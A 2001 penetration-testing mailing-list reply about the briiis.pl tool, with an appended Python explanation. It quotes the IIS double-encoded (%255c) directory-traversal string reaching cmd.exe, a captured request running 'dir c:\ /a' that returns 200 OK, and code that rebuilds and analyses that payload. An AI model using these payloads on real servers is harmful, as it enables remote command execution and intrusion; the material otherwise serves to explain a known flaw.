Re: iXsecurity.tool.briiis.3.02

From: Nicolas Gregoire (nicolas.gregoireat_private)
Date: Thu Jun 14 2001 - 01:35:53 PDT


    Sigtrap wrote :
    > 
    > Nicolas Gregoire writes:
    >
    > > $explstr="/..$opt_F..$opt_F..$opt_F..$opt_F..$opt_F..$opt_F..$opt_F..$opt_F../winnt/system32/cmd.exe?/c+$opt_c"
    >
    > Has Nicolas tested his change before mailing pen-test?
    > If you change Ian Vitek's briiis with the NEW LINE, the double encoding vulnerability testing (%255c)
    > will fail due to the last '../'.
    
    I, of course, tested it before sending the patch ... and it works fine
    for me.
    Here is an Ethereal capture (done with "./briiis.pl -s XXXXXX -v -F
    %255c"):
    
    GET /_vti_bin/..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+c:\+/a HTTP/1.0
    Host: XXXXXXXXXXXXX
    
    HTTP/1.1 200 OK
    
    > Briiis is not a toy, it is a weapon. Use it to defend yourself, not attacking. ;-)
    
    No, briiis.pl is a tool. Just a tool. Like guns.
    And policemen and robbers both have guns ...
    ;-)
    
    Nicob
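The following is an added example, not code from briiis.pl or from either poster. It rebuilds the `$explstr` path discussed above from the `-F` separator and the `-s` prefix, then models (as a simplifying assumption, not IIS's real code) what a server that URL-decodes once before its access check and again before mapping the path to the file system makes of it. The point it shows: with `%255c` the first decode yields `%5c`, so the access check still sees a path under `/_vti_bin`, while the second decode yields `\` and the path collapses to `cmd.exe`; the trailing `../` is just one more level of traversal absorbed at the root. The `script_dir` argument and the `analyse` helper are this example's own.

```python
"""Model of the briiis -F request and of single- versus double-decoding.

Added example, not briiis.pl code. The decode/normalise steps are a
simplified model of server behaviour (assumption), not IIS's implementation.
"""
import posixpath
from urllib.parse import unquote, urlsplit

CMD_PATH = "/winnt/system32/cmd.exe"


def build_explstr(opt_f: str, opt_c: str, prefix: str = "") -> str:
    """Rebuild the $explstr line from the thread: nine '..' joined by the -F
    separator, then cmd.exe, prefixed with the -s directory (e.g. /_vti_bin)."""
    traversal = opt_f.join([".."] * 9)
    return f"{prefix}/{traversal}{CMD_PATH}?/c+{opt_c}"


def resolve(path: str) -> str:
    """Map a decoded path to a file-system path the naive way: treat '\\' as
    '/' and collapse '..' (posixpath.normpath drops '..' that climbs past root)."""
    return posixpath.normpath(path.replace("\\", "/"))


def analyse(request_target: str, script_dir: str) -> dict:
    """Return how the target looks after one and after two URL-decode passes."""
    parts = urlsplit(request_target)
    once = unquote(parts.path)   # decode pass done before the access check (model)
    twice = unquote(once)        # second decode before the file-system mapping (model)
    acl_view, fs_view = resolve(once), resolve(twice)
    return {
        "acl_view": acl_view,
        "fs_view": fs_view,
        # the access check believes the request stays inside the script directory
        "looks_inside_script_dir": acl_view.startswith(script_dir + "/"),
        # ... while the file-system layer is handed cmd.exe
        "reaches_cmd": fs_view.lower() == CMD_PATH,
        # the query string becomes the command line for cmd.exe /c
        "command": parts.query.replace("+", " "),
    }


if __name__ == "__main__":
    # constructed sample: the same options as the capture in the thread
    for sep in ("%5c", "%255c"):
        target = build_explstr(sep, "dir+c:\\+/a", prefix="/_vti_bin")
        print(sep, target)
        print("   ", analyse(target, "/_vti_bin"))
```

Run stand-alone it prints both variants: with a single-encoded `%5c` the first decode already exposes the traversal, so an access check that decodes once would reject it; with `%255c` only the second decode exposes it, which is exactly the condition the `-F %255c` run above exercises.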
    



    This archive was generated by hypermail 2b30 : Thu Jun 14 2001 - 10:37:40 PDT